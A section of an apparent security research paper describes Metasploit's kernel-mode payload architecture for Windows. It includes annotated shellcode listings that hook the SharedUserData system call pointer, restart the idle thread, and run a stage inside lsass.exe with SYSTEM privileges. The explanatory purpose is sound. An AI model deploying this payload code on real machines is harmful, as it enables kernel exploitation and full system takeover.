Payload Architecture
The payload architecture that the authors decided to integrate was based
heavily on previous research [1]. As was alluded to in the
introduction, there are a number of complicated considerations that must be
taken into account when dealing with kernel-mode exploitation. A large
majority of these considerations are directly related to what methods should be
used when executing arbitrary code in the kernel. For example, if a device
driver was holding a lock at the time that an exploit was triggered, what
might be the best way to go about releasing that lock so as to recover the
system so that it will still be possible to interact with it in a meaningful
way? Other types of considerations include things like IRQL restrictions,
cleaning up corrupted structures, and so on. These considerations lead to
there being many different ways in which a payload might best be implemented
for a particular vulnerability. This is quite a bit different from the
user-mode environment where it's almost always possible to use the exact same
payload regardless of the application.
Though these situational complications do exist, it is possible to design and
implement a payload system that can be applied in almost any circumstance. By
separating kernel-mode payloads into variable components, it becomes possible
to combine components together in different ways to form functional variations
that are best suited for particular situations. In Windows
Kernel-mode Payload Fundamentals [1], kernel-mode payloads are
broken down into four different components: migration, stagers, recovery, and
stages.
When describing kernel-mode payloads in terms of components, the
migration component would be one that is used to migrate from an
unsafe execution environment to a safe execution environment. For example, if
the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary
to migrate to a safer IRQL such as PASSIVE. It is not always necessary to
have a migration component. The purpose of a stager component is to
move some portion of the payload so that it executes in the context of another
thread. This may be necessary if the current thread is of critical
importance or may lead to a deadlock of the system should certain operations
be used. The use of a stager may obviate the need for a migration component.
A recovery component is something that is used to restore the system
to a clean state and then continue execution. This component is generally one
that may require customization for a given vulnerability as it may not always
be possible to describe the steps needed to recover the system in a generic way.
For example, if locks were held at the time that the vulnerability was
triggered, it may be necessary to find a way to release those locks and then
continue execution from a safe point. Finally, the stage component
is a catch-all for whatever arbitrary code may be executed once the payload is
running in a safe environment.
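The component breakdown above can be pictured as a small composition model. The following is a minimal sketch, not code from [1] or from the framework: the KernelPayload structure, its method names, and the placeholder strings are all hypothetical, and real components are machine code rather than labels.

```ruby
# Hypothetical model of the four-component breakdown; every name here is
# illustrative and the strings stand in for machine code.
KernelPayload = Struct.new(:migration, :stager, :recovery, :stage) do
  # List the components that are actually present.
  def components
    to_h.reject { |_, code| code.nil? }.keys
  end

  # Join the present components in the order they are listed above.
  def assemble
    [migration, stager, recovery, stage].compact.join
  end
end

# A payload that, like the one discussed in this chapter, uses three of the
# four components and omits migration.
payload = KernelPayload.new(nil, "STAGER|", "RECOVERY|", "STAGE")
puts payload.components.inspect
puts payload.assemble
```

Swapping only the recovery member while leaving the others alone is the kind of substitution the component model is meant to allow.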
This model for describing kernel-mode payloads is what the authors decided to
adopt. To better understand how this model works, it seems best to describe
how it was applied to all three real-world vulnerabilities that are shown in
chapter 5. These three vulnerabilities actually make use of the same
basic underlying payload, which will henceforth be referred to as "the
payload" for brevity. The payload itself is composed of three of the four
components. Each of the payload components will be discussed individually and
then as a whole to provide an idea for how the payload operates.
The first component that exists in the payload is a stager component. The
stager that the authors chose to use is based on the SharedUserData
SystemCall Hook stager described in [1]. Before understanding
how the stager works, it's important to understand a few things. As the name
implies, the stager accomplishes its goal by hooking the SystemCall
attribute found within SharedUserData. As a point of reference,
SharedUserData is a global page that is shared between user-mode and
kernel-mode. It acts as a sort of global structure that contains things like
tick count and time information, version information, and quite a few other
things. It's extremely useful for a few different reasons, not the least of
which being that it's located at a fixed address in user-mode and in
kernel-mode on all NT derivatives. This means that the stager is instantly
portable and doesn't need to perform any symbol resolution to locate the
address, thus helping to keep the overall size of the payload small.
The SystemCall attribute that is hooked is part of an enhancement
that was added in Windows XP. This enhancement was designed to make it
possible to use optimized system call instructions depending on what hardware
support is present on a given machine. Prior to Windows XP, system calls were
dispatched from user-mode through the hardcoded use of the int 0x2e
soft interrupt. Over time, hardware enhancements were made to decrease the
overhead involved in performing a system call, such as through the
introduction of the sysenter instruction. Since Microsoft isn't in
the business of providing different versions of Windows for different makes
and models of hardware, they decided to determine at runtime which system call
interface to use. SharedUserData was the perfect candidate for
storing the results of this runtime determination as it was already a shared
page that existed in every user-mode process. After making these
modifications, ntdll.dll was updated to dispatch system calls
through SharedUserData rather than through the hardcoded use of
int 0x2e. The initial implementation of this new system call
dispatching interface placed executable code within the SystemCall
attribute of SharedUserData. Subsequent versions of Windows, such as
XP SP2, turned the SystemCall attribute into a function pointer.
One important implication about the introduction of the SystemCall
attribute to SharedUserData is that it represents a pivot point
through which all system call dispatching occurs in user-mode. In previous
versions of Windows, each user-mode system call stub routine invoked
int 0x2e directly. In the latest versions, these stub routines make
indirect calls through the SystemCall function pointer. By default,
this function pointer is initialized to point to one of a few exported symbols
within ntdll.dll. However, the implications of this function pointer
being changed to point elsewhere mean that it would be possible to intercept
all system calls within all processes. This implication is what forms the
very foundation for the stager that is used by the payload.
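The effect of redirecting a single shared function pointer can be modeled in a few lines. This is only a conceptual sketch: a Ruby object stands in for SharedUserData, procs stand in for native code, and the class and method names are hypothetical.

```ruby
# Model only: nothing here touches a real system.
class SharedUserDataModel
  attr_accessor :system_call

  def initialize
    # Default dispatcher, standing in for the routine inside ntdll.dll.
    @system_call = ->(number) { "dispatched #{number}" }
  end
end

# Every stub in every process calls through the same shared pointer.
def syscall_stub(shared, number)
  shared.system_call.call(number)
end

shared = SharedUserDataModel.new
seen = []

# Hook: save the original pointer, then redirect to an interceptor that
# records the call and chains to the original dispatcher.
original = shared.system_call
shared.system_call = lambda do |number|
  seen << number
  original.call(number)
end

result = syscall_stub(shared, 0x25)
puts result
puts seen.inspect
```

Because every stub goes through the one pointer, a single write is enough to observe all calls, and chaining to the saved pointer keeps dispatching intact.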
When the stager begins executing, it's running in kernel-mode in the context of
the thread that triggered the vulnerability. The first action it takes is to
copy a chunk of code (the stage) into an unused portion of
SharedUserData using the predictable address of 0xffdf037c.
After the copy operation completes, the stager proceeds by hooking the
SystemCall attribute. This hook must be handled differently
depending on whether the target operating system predates XP SP2.
More details on how this can be handled are described in [1].
Regardless of the approach, the SystemCall attribute is redirected to
point to 0x7ffe037c. This predictable location is the user-mode
accessible address of the unused portion of SharedUserData where the
stage was copied. After the hooking operation completes, all system calls
invoked by user-mode processes will first go through the stage placed at
0x7ffe037c. The stager portion of the payload looks something like
this (see footnote 4.1):
; Jump/Call to get the address of the stage
00000000 EB38 jmp short 0x3a
00000002 BB0103DFFF mov ebx,0xffdf0301
00000007 4B dec ebx
00000008 FC cld
; Copy the stage into 0xffdf037c
00000009 8D7B7C lea edi,[ebx+0x7c]
0000000C 5E pop esi
0000000D 6AXX push byte num_stage_dwords
0000000F 59 pop ecx
00000010 F3A5 rep movsd
; Set edi to the address of the soon-to-be function pointer
00000012 BF7C03FE7F mov edi,0x7ffe037c
; Check to make sure the hook hasn't already been installed
00000017 393B cmp [ebx],edi
00000019 7409 jz 0x24
; Grab SystemCall function pointer
0000001B 8B03 mov eax,[ebx]
0000001D 8D4B08 lea ecx,[ebx+0x8]
; Store the existing value in 0x7ffe0308
00000020 8901 mov [ecx],eax
; Overwrite the existing function pointer and make things live!
00000022 893B mov [ebx],edi
; recovery stub here
0000003A E8C3FFFFFF call 0x2
; stage here
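The address arithmetic in the stager listing can be checked with a short script. This is a sketch for verification only. The constant and function names are hypothetical, the base addresses are inferred from the addresses quoted in the text, and the remark about the zero byte is an assumption about why the listing loads 0xffdf0301 and then decrements it.

```ruby
# Base addresses of the SharedUserData page in kernel-mode and user-mode,
# inferred from the addresses used in the listing.
KERNEL_BASE = 0xffdf0000
USER_BASE   = 0x7ffe0000

SYSTEMCALL_OFFSET = 0x300 # SystemCall attribute
SAVED_PTR_OFFSET  = 0x308 # where the stager saves the original pointer
STAGE_OFFSET      = 0x37c # unused area that receives the stage

# Translate a kernel-mode SharedUserData address to its user-mode alias.
def user_alias(kernel_address)
  kernel_address - KERNEL_BASE + USER_BASE
end

# mov ebx,0xffdf0301 ; dec ebx
# Assumption: loading 0x...01 and decrementing keeps a zero byte out of the
# encoded instruction.
ebx = 0xffdf0301 - 1
# lea edi,[ebx+0x7c]
edi = ebx + 0x7c

printf("SystemCall (kernel): 0x%08x\n", ebx)
printf("stage (kernel):      0x%08x\n", edi)
printf("stage (user):        0x%08x\n", user_alias(edi))
printf("saved ptr (user):    0x%08x\n", user_alias(ebx + 8))

# Displacement of the 5-byte call at offset 0x3a that targets offset 0x2.
rel32 = (0x2 - (0x3a + 5)) & 0xffffffff
printf("call rel32:          0x%08x\n", rel32)
```

The computed displacement matches the C3FFFFFF bytes that follow the E8 opcode in the listing, and the user-mode aliases match the 0x7ffe037c and 0x7ffe0308 addresses used by the stage.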
With the hook in place, the stager has completed its primary task, which was to
copy a stage into a location where it could be executed in the future. Before
the stage can execute, the stager must allow the recovery component of the
payload to execute. As mentioned previously, the recovery component
represents one of the most vulnerability-specific portions of any kernel-mode
payload. For the purpose of the exploits described in chapter 5, a
special purpose recovery component was necessary.
This particular recovery component was required due to the fact that the
example vulnerabilities are triggered in the context of the Idle
thread. On Windows, the Idle thread is a special kernel thread that
executes whenever a processor is idle. Due to the nature of the way the
Idle thread operates, it's dangerous to perform operations like
spinning the thread or any of the other recovery methods described in
[1]. It may also be possible to apply the technique for
delaying execution within the Idle thread as discussed in
[2]. The recovery method that was finally selected involves two basic
steps. First, the IRQL for the current processor is restored to DISPATCH
level just in case it was executing at a higher IRQL. Second, execution
control is transferred into the first instruction of nt!KiIdleLoop
after initializing registers appropriately. The end effect is that the idle
thread begins executing all over again and, if all goes well, the system
continues operating as if nothing had happened. In practice, this recovery
method has been proven reliable. However, its one drawback is
that it requires knowledge of the address at which nt!KiIdleLoop resides.
This dependence represents an area that is ripe for future improvement.
Regardless of limitations, the recovery component for the payload looks like
the code below:
; Restore the IRQL
00000024 31C0 xor eax,eax
00000026 64C6402402 mov byte [fs:eax+0x24],0x2
; Initialize assumed registers
0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c]
00000031 B827BB4D80 mov eax,0x804dbb27
00000036 6A00 push byte +0x0
; Transfer control to nt!KiIdleLoop
00000038 FFE0 jmp eax
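Since the nt!KiIdleLoop address is the only part of this stub that varies between targets, the stub can be generated from a template. The sketch below rebuilds the bytes shown in the listing for a supplied address. The function name is hypothetical and this is not the framework's generator.

```ruby
# Build the recovery stub bytes from the listing for a given nt!KiIdleLoop
# address. Hypothetical helper, shown only to illustrate the byte layout.
def idlethread_restart_stub(ki_idle_loop)
  hex = ->(digits) { [digits].pack("H*") }
  [
    hex.call("31c0"),                          # xor eax,eax
    hex.call("64c6402402"),                    # mov byte [fs:eax+0x24],0x2
    hex.call("8b1d1cf0dfff"),                  # mov ebx,[0xffdff01c]
    hex.call("b8") + [ki_idle_loop].pack("V"), # mov eax,<little-endian address>
    hex.call("6a00"),                          # push byte +0x0
    hex.call("ffe0")                           # jmp eax
  ].join
end

stub = idlethread_restart_stub(0x804dbb27)
puts stub.unpack1("H*")
puts stub.bytesize
```

The stub is 22 bytes long, which agrees with the listing: the recovery code starts at offset 0x24 and the next instruction is at 0x3a.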
After the recovery component has completed its execution, all of the payload
code that was originally executing in kernel-mode is complete. The final
portion of the payload that remains to be executed is the stage that was
copied by the stager. The stage itself runs in user-mode within all process
contexts, and it executes every time a system call is dispatched. The
implications of this should be obvious. Having a stage that executes within
every process every time a system call occurs is just asking for trouble. For
that reason, it makes sense to design a generic user-mode stage that can be
used to limit the times that it executes to one particular context.
The approach that the authors took to meet this requirement is as follows.
First, the stage performs a check that is designed to see if it is running in
the context of a specific process. This check is there in order to help
ensure that the stage itself only executes in a known-good environment. As an
example, it would be a shame to take advantage of a kernel-mode vulnerability
only to finally execute code with the privileges of Guest. By default, this
check is designed to see if the stage is running within lsass.exe, a
process that runs with SYSTEM level privileges. If the stage is
running within lsass, it performs a check to see if the
SpareBool attribute of the Process Environment Block has
been set to one. By default, this value is initialized to zero in all
processes. If the SpareBool attribute is set to zero, then the stage
proceeds to set the SpareBool attribute to one and then finishes by
executing whatever code is remaining within the stage. If the
SpareBool attribute is set to one, which means the stage has already
run, or it's not running within lsass, it transfers control back to the
original system call dispatching routine. This is necessary because it is
still a requirement that system calls from user-mode processes be dispatched
appropriately, otherwise the system itself would grind to a halt. An example
of what this stage might look like is shown below:
; Preserve the calling environment
0000003F 60 pusha
00000040 6A30 push byte +0x30
00000042 58 pop eax
00000043 99 cdq
00000044 648B18 mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047 39530C cmp [ebx+0xc],edx
0000004A 7426 jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C 8B5B10 mov ebx,[ebx+0x10]
0000004F 8B5B3C mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052 83C328 add ebx,byte +0x28
; Compare a value derived from the executable name with the one expected
; for lsass (0x7373616c, the ASCII bytes of "lass")
00000055 8B0B mov ecx,[ebx]
00000057 034B03 add ecx,[ebx+0x3]
0000005A 81F96C617373 cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060 7510 jnz 0x72
00000062 648B18 mov ebx,[fs:eax]
00000065 43 inc ebx
00000066 43 inc ebx
00000067 43 inc ebx
; Check if Peb->SpareBool is 1, if it is, execute the original
; system call dispatcher
00000068 803B01 cmp byte [ebx],0x1
0000006B 7405 jz 0x72
; Set Peb->SpareBool to 1
0000006D C60301 mov byte [ebx],0x1
; Jump into the continuation stage
00000070 EB07 jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072 61 popa
00000073 FF250803FE7F jmp near [0x7ffe0308]
; continuation of the stage
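The name comparison in the listing is compact enough to be easy to misread, so it helps to reproduce it outside of assembly. The sketch below models the two overlapping 32-bit loads on a UTF-16LE name and the SpareBool gate. The function names and the hash standing in for the PEB are hypothetical, and the Peb->Ldr check from the listing is omitted.

```ruby
LSASS_VALUE = 0x7373616c

# mov ecx,[ebx] ; add ecx,[ebx+0x3]
# Two overlapping little-endian dword loads from the wide-character name.
def name_check_value(image_name)
  wide = image_name.encode("UTF-16LE").b
  return nil if wide.bytesize < 7

  first  = wide.byteslice(0, 4).unpack1("V")
  second = wide.byteslice(3, 4).unpack1("V")
  (first + second) & 0xffffffff
end

# Run the stage once, and only in the selected process.
def stage_should_run?(image_name, peb)
  return false unless name_check_value(image_name) == LSASS_VALUE
  return false if peb[:spare_bool] == 1

  peb[:spare_bool] = 1
  true
end

peb = { spare_bool: 0 }
printf("0x%08x\n", name_check_value("lsass.exe"))
puts stage_should_run?("lsass.exe", peb)
puts stage_should_run?("lsass.exe", peb)
puts stage_should_run?("svchost.exe", { spare_bool: 0 })
```

Only the first four characters of the name contribute to the computed value, so the comparison is a cheap filter rather than an exact match on the full file name.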
The culmination of these three payload components is a functional payload that
can be used in any situation where an exploit is triggered within the
Idle thread. If the exploit is triggered outside of the context of
the Idle thread, the recovery component can be swapped out with an
alternative method and the rest of the payload can remain unchanged. This is
one of the benefits of breaking kernel-mode payloads down into different
components. To recap, the payload works by using a stager to copy a stage
into an unused portion of SharedUserData. The stager then points the
SystemCall attribute to that unused portion, effectively causing all
user-mode processes to bounce through the stage when they attempt to make a
system call. Once the stager has completed, the recovery component restores
the IRQL to DISPATCH and then restarts the Idle thread. The
kernel-mode portion of the payload is then complete. Shortly after that, the
stage that was copied to SharedUserData is executed in the context of
a specific user-mode process, such as lsass.exe. Once this occurs,
the stage sets a flag that indicates that it's been executed and completes.
All told, the payload itself is only 115 bytes, excluding any additional code
in the stage.
Given all of this infrastructure work, it's trivial to plug almost any
user-mode payload into the stage. The additional code must simply be placed
at the point where it's verified that it's running in a particular process and
that it hasn't been executed before. This simplicity was
intentional. One of the major goals in implementing this payload system
was to make it possible to use the existing set of payloads that exist in the
Metasploit framework in conjunction with any kernel-mode exploit. This
includes even some of the more powerful payloads such as Meterpreter and VNC
injection.
There were two key elements involved in integrating kernel-mode payloads into
the 3.0 version of the Metasploit Framework. The first had to do with
defining the interface that exploit developers would need to use when writing
kernel-mode exploits. The second dealt with defining the interface the
end-users would have to be aware of when using kernel-mode exploits. In terms
of precedence, defining the programming level interfaces first is the ideal
approach. To that point, the programming interface that was decided upon is
one that should be pretty easy to use. The majority of the complexity
involved in selecting a kernel-mode payload is hidden from the developer.
There are only a few basic things that the developer needs to be aware of.
When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to
include the Msf::Exploit::KernelMode mixin. This mixin provides
hints to the framework that make it aware of the fact that any payloads used
with this exploit will need to be appropriately encapsulated within a
kernel-mode stager. With this simple action, the majority of the work
associated with the kernel-mode payload is abstracted away from the developer.
The only other element that a developer may need to deal with is the process
of defining extended parameters that further control the selection of
different aspects of the kernel-mode payload. These controllable
parameters are exposed to developers through the ExtendedOptions hash
element in an exploit's global or target-specific Payload options.
An example of what this might look like within an exploit can be seen here:
'Payload' =>
  {
    'ExtendedOptions' =>
      {
        'Stager'            => 'sud_syscall_hook',
        'Recovery'          => 'idlethread_restart',
        'KiIdleLoopAddress' => 0x804dbb27,
      }
  }
In the above example, the exploit has explicitly selected the underlying
stager component that should be used by specifying the Stager hash
element. The sud_syscall_hook stager is a symbolic name for the
stager that was described in section 4.1. The example above
also has the exploit explicitly selecting the recovery component that should
be used. In this case, the recovery component that is selected is
idlethread_restart which is a symbolic name for the recovery
component described previously. Additionally, the nt!KiIdleLoop
address is specified for use with this particular recovery component.
Under the hood, the use of the KernelMode mixin and the additional
extended options results in the framework encapsulating whatever user-mode
payload the end-user specified inside of a kernel-mode stager. In the end,
this process is entirely transparent to both the developer and the end-user.
While the set of options that can be specified in the extended options hash
will surely grow in the future, it makes sense to at least document the set of
defined elements at the time of this writing. These options are described in
the following table:
Hash Element | Description |
Recovery | Defines the recovery component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes spin, which will spin the current thread, idlethread_restart, which will restart the Idle thread, and default, which is equivalent to spin. Over time, more recovery methods may be added. These can be found in recovery.rb. |
RecoveryStub | Defines a custom recovery component. |
Stager | Defines the stager component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes sud_syscall_hook. Over time, more stager methods may be added. These can be found in stager.rb. |
UserModeStub | Defines the user-mode custom code that should be executed as part of the stage. |
RunInWin32Process | Currently only applicable to the sud_syscall_hook stager. This element specifies the name of the system process, such as lsass.exe, that should be injected into. |
KiIdleLoopAddress | Currently only applicable to the idlethread_restart recovery component. This element specifies the address of nt!KiIdleLoop. |
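To make the option semantics concrete, the following sketch resolves an extended options hash against the values listed in the table. It is not the framework's implementation. The function name is hypothetical, and two behaviors are assumptions rather than documented facts: that sud_syscall_hook is used when no Stager is given, and that idlethread_restart is rejected when KiIdleLoopAddress is missing.

```ruby
# Hypothetical resolver for the ExtendedOptions hash; not the framework's code.
VALID_RECOVERY = %w[spin idlethread_restart default].freeze
VALID_STAGERS  = %w[sud_syscall_hook].freeze

def resolve_extended_options(opts)
  recovery = opts.fetch('Recovery', 'default')
  # Assumption: the only documented stager is used when none is specified.
  stager = opts.fetch('Stager', 'sud_syscall_hook')

  raise ArgumentError, "unknown recovery: #{recovery}" unless VALID_RECOVERY.include?(recovery)
  raise ArgumentError, "unknown stager: #{stager}" unless VALID_STAGERS.include?(stager)

  # Per the table, default is equivalent to spin.
  recovery = 'spin' if recovery == 'default'

  # Assumption: the idle thread restart cannot be generated without an address.
  if recovery == 'idlethread_restart' && !opts.key?('KiIdleLoopAddress')
    raise ArgumentError, 'idlethread_restart requires KiIdleLoopAddress'
  end

  opts.merge('Recovery' => recovery, 'Stager' => stager)
end

resolved = resolve_extended_options(
  { 'Recovery' => 'idlethread_restart', 'KiIdleLoopAddress' => 0x804dbb27 }
)
puts resolved.inspect
```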
While not particularly important to developers or end-users, it may be
interesting for some to understand how this abstraction works internally. To
start things off, the KernelMode mixin overrides a base class method
called encode_begin. This method is called when a payload that is
used by an exploit is being encoded. When this happens, the mixin declares a
procedure that the payload encoder calls in order to encapsulate the
pre-encoded payload. The procedure itself is passed the original raw
user-mode payload and the payload options hash (which contains the extended
options, if any, that were specified in the exploit). It uses this
information to construct the kernel-mode stager that is used to encapsulate
the user-mode payload. If the procedure completes successfully, it returns a
non-nil buffer that contains the original user-mode payload encapsulated
within a kernel-mode stager. The kernel-mode stager and other components are
actually contained within the payloads subsystem of the Rex library
under lib/rex/payloads/win32/kernel.
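The override mechanism described above can be modeled without the framework. In the sketch below, ExploitModel, KernelModeModel, and DemoExploit are hypothetical stand-ins, the method signatures are assumptions, and bracketed labels take the place of the real stager and recovery code. Only the control flow is meant to mirror the description.

```ruby
# Stand-in base class; the real framework class is not reproduced here.
class ExploitModel
  def encode_begin(_raw_payload, _payload_opts)
    # The base implementation registers no encapsulation procedure.
    @encapsulate_proc = nil
  end

  # Stand-in for the payload encoder: it gives the exploit a chance to
  # register a procedure and calls it before any encoding would happen.
  def encode(raw_payload, payload_opts)
    encode_begin(raw_payload, payload_opts)
    buf = raw_payload
    buf = @encapsulate_proc.call(buf, payload_opts) if @encapsulate_proc
    raise 'encapsulation failed' if buf.nil?

    buf
  end
end

# Stand-in for the mixin: it overrides encode_begin and declares the
# procedure that wraps the raw user-mode payload.
module KernelModeModel
  def encode_begin(raw_payload, payload_opts)
    super
    @encapsulate_proc = lambda do |raw, opts|
      ext = opts.fetch('ExtendedOptions', {})
      stager = ext.fetch('Stager', 'sud_syscall_hook')
      recovery = ext.fetch('Recovery', 'spin')
      format('[%s][%s]%s', stager, recovery, raw)
    end
  end
end

class DemoExploit < ExploitModel
  include KernelModeModel
end

opts = { 'ExtendedOptions' => { 'Recovery' => 'idlethread_restart' } }
wrapped = DemoExploit.new.encode('USERMODE', opts)
puts wrapped
```

An exploit class that does not include the module passes its payload through unchanged, which is why the encapsulation stays invisible to exploits that do not need it.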